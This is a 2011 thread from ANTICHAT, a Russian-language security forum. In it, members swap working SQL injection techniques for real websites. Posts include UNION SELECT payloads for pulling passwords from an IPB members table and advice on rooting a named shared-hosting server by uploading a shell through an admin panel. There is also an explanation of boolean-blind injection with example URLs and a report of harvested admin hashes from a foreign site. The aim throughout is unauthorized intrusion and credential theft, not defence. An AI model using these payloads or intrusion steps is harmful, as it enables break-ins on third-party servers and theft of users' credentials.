HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #16111  
Старый 12.01.2011, 19:27
Unknown
Guest
Сообщений: n/a
Провел на форуме:
191387

Репутация: 6
По умолчанию

mysql 5 версия

Цитата:
Сообщение от None  
-1+union+Select+1,2,3,4,5,6,7+from+table1.ibf_membe rs+--+
выводимые поля 2 и 3

не выводит

Цитата:
Сообщение от None  
-1+union+Select+1,password,3,4,5,6,7+from+table1.ib f_members+--+
не выводит

Цитата:
Сообщение от None  
-1+union+Select+1,unhex(hex(password)),3,4,5,6,7+fr om+table1.ibf_members+--+
Цитата:
Сообщение от None  
-1+union+Select+1,aes_decrypt(aes_encrypt(password) ),3,4,5,6,7+from+table1.ibf_members+--+
тоже не выводит

group_concat, concat пробовал

из другой любой кроме ibf_members выводит данные, как обойти?
 
Ответить с цитированием

  #16112  
Старый 12.01.2011, 20:00
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

мб написать count(password) и увидеть 0? если всё таки с group_concat не прокатило
 
Ответить с цитированием

  #16113  
Старый 13.01.2011, 02:05
Modex
Guest
Сообщений: n/a
Провел на форуме:
800

Репутация: 0
По умолчанию

Есть сайтик www.mirdoors.ru на сервере лежит еще 27 разных сайтов, требуется как нить порутать сервак , нашел на 4 сайтах SQL,и file_priv нету, что можно сделать ?
 
Ответить с цитированием

  #16114  
Старый 13.01.2011, 02:06
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

Цитата:
Сообщение от Modex  
Modex said:
Есть сайтик www.mirdoors.ru на сервере лежит еще 27 разных сайтов, требуется как нить порутать сервак , нашел на 4 сайтах SQL,и file_priv нету, что можно сделать ?
я так понимаю что шeлл у тебя там есть , если ты предлагаешь порутать , и если порутать то давай в студию uname -a
 
Ответить с цитированием

  #16115  
Старый 13.01.2011, 02:23
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846

Репутация: 56
По умолчанию

Цитата:
Сообщение от Modex  
Modex said:
Есть сайтик, на сервере лежит еще 27 разных сайтов, требуется как нить порутать сервак , нашел на 4 сайтах SQL,и file_priv нету, что можно сделать ?
Через админку заливайся, раз прав нет.

Как зальешься, тебе сюда /thread235697.html
 
Ответить с цитированием

  #16116  
Старый 13.01.2011, 09:21
Unknown
Guest
Сообщений: n/a
Провел на форуме:
191387

Репутация: 6
По умолчанию

в SQLI Helper - Blind Dump есть поле Keyword True что оно означает и что нужно туда писать, для Joomla например
 
Ответить с цитированием

  #16117  
Старый 13.01.2011, 09:36
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию

Вообще в софте подобного рода поле Keyword обозначает слово, которое возвращается из запроса в случае TRUE и в случае FALSE,

например

http://site/bug?id=1 (в титле выводит "Article 1")

http://site/bug?id=1+and+1=1 (в титле выводит "Article 1")

http://site/bug?id=1+and+1=0 (в титле ничего не выводит)

тогда в этом случае слово "Article 1" будет значением для Keyword
 
Ответить с цитированием

  #16118  
Старый 13.01.2011, 09:52
Unknown
Guest
Сообщений: n/a
Провел на форуме:
191387

Репутация: 6
По умолчанию

Цитата:
Сообщение от Expl0ited  
Expl0ited said:
Вообще в софте подобного рода поле Keyword обозначает слово, которое возвращается из запроса в случае TRUE и в случае FALSE,
например
http://site/bug?id=1 (в титле выводит "Article 1")
http://site/bug?id=1+and+1=1 (в титле выводит "Article 1")
http://site/bug?id=1+and+1=0 (в титле ничего не выводит)
тогда в этом случае слово "Article 1" будет значением для Keyword
А обязательно в титле брать значени Keyword-а

или можно любое значение которое исчезает на странице?
 
Ответить с цитированием

  #16119  
Старый 13.01.2011, 10:01
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию

Необязательно, значение Keyword это выводимые из БД данные
 
Ответить с цитированием

  #16120  
Старый 13.01.2011, 14:09
valyka80
Новичок
Регистрация: 14.06.2010
Сообщений: 0
Провел на форуме:
930

Репутация: 0
По умолчанию

Вообщем наковырял паролей (хешей),но они все вот такиесайт пакистанский)

superadmin:С/FSсЅБvрЛґЈѓЊУ N$Ї
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ